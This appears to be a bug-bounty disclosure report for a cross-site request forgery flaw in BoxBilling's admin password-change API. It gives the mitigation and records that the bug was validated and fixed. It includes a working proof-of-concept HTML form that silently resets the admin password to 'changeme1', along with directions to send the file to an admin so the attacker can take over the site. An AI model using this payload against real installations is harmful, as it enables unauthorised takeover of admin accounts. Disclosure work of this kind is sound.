Cross-Site Request Forgery (CSRF) in boxbilling/boxbilling

Valid

Reported on

Jul 5th 2021


✍️ Description

CSRF on changing password of an admin account. There is no token or anti csrf implemented.

🕵️‍♂️ Proof of Concept

Create a .html file (poc.html) for example and copy paste the following code in it. Change localhost to ur domain or ip address.

<html><head>
<title>CSRF PoC</title>
</head><body>
<form action="http://localhost/box/api/admin/profile/change_password" method="POST">
<input type="hidden" name="password" value="changeme1" /><br />
<input type="hidden" name="password_confirm" value="changeme1" /><br />
<input type='submit' value='Click here' />
</form>
</body></html>

send this file to a admin when he opens the file and clicks on it the password will be change to changeme1. see the screenshot below with a burp request of what is happening.

💥 Impact

This vulnerability is capable of changing the admin password into a new one. If you send the admin the link and he clicks on it the password will be changed directly because there is no csrf protection. With this attack you can become an admin on the website.

💥 Mitigation

Verify the old_password first.

Implement anti csrf

💥 References

https://owasp.org/www-community/attacks/csrf

https://portswigger.net/web-security/csrf

Occurrences

We have contacted a member of the boxbilling team and are waiting to hear back a year ago
Timothy Webb Sr validated this vulnerability a year ago
ribersec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Timothy Webb Sr marked this as fixed with commit 42cde7 a year ago
Belle Aerni has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome
a year ago

Admin


Just for reference, I added @bennottelling as the fixer to this report and has been confirmed by the maintainers.

to join this conversation